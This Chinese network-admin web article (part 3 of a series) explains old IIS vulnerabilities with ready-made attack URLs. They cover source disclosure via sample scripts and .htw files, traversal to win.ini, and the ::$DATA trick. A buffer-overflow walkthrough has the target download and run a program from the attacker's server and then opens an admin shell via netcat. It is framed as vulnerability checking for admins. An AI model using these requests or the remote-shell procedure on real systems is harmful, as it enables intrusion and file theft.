用户名:密 码:验证码 我要投稿 电脑技巧 信息订阅 高级搜索 网站地图 加入收藏
中国网管站 中国网管站发展目标  
我要学→
当前位置:中国网管站首页>高级网管>网吧安全技术>文章内容

网管必知:IIS中常见的十八个安全漏洞(3)

来源:yesky.com 作者: 发布时间:2007-12-02  (阅读次数:)  查看更多关于: 网管 IIS 安全漏洞 的文章
9.Codebrws.asp

  察看文件源代码

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  10.Showcode.asp

  察看文件源代码

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  11.Null.htw

  察看文件源代码

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  12.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

  一个攻击者可以使用如下的方法来访问系统中文件的内容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码

  13. iis4hack缓冲溢出

 

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat来连接你要检测的服务器:

  c:>nc 80

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip


上一篇:网管必知:IIS中常见的十八个安全漏洞(2)   下一篇:网管必知:IIS中常见的十八个安全漏洞(4)
[收藏] [推荐] [返回顶部][打印本页] [关闭窗口]  
  相关文章
·网管必知:IIS中常见的十八个安
·网管必知:IIS中常见的十八个安
·网管必知:IIS
·了解网管必知:IIS中常见的十八
·网吧服务器RAID 0+1硬盘阵列组建
·网吧服务器RAID 0+1硬盘阵列组建
·学习网吧管理的漏洞及其防范
·教你如何鉴别硬件防火墙性能的差
·学习怎样保护好局域网中的IP地址
·网管必知:防火墙应用八项实用技
·网管注意:MySQL服务器程序又现
·学习虚拟主机安全配置方法
·学习虚拟主机安全配置方法(2)
·学习防范伪装成可信IP地址的攻击
·学习验证码的破解(1)
·学习Microsoft Windows TCP/IP报
·了解:McAfee E-Business Server
·学习OpenBSD rtlabel_id2name()
·克隆恢复技术介绍
·防火墙后的身份验证
  热点文章
·DeepFreeze冰点还原精灵使用图解
·如何用命令查看arp病毒主机
·怎么突破网吧限制
·学会用Sniffer和ARP分析网络问题
·网吧ARP欺骗到局域网的安全管理
·如何解决IP冲突问题
·网吧服务器RAID 0+1硬盘阵列组建
·如何查看网吧网络管理软件的漏洞
·如何恢复BIOS数据
·网吧服务器RAID 0+1硬盘阵列组建
·网吧管理软件万能破解方法
·学习怎样保护好局域网中的IP地址
·破解网吧限制逍遥行
·谈入侵万象网吧服务器
·备份和恢复Oracle数据过程
·了解网络安全入门要了解的问题
·克隆恢复技术介绍
·网管必知:IIS中常见的十八个安
·如何教会客户自己给系统打补丁
·网吧管理软件破解实例讲解
Copyright@2007 中国网管站 All Rights Reserved 陕ICP备07501327号
E-mail:qidian512@163.com 电话:13759975857
编辑负责QQ:347795937 251695990 技术交流群:45212068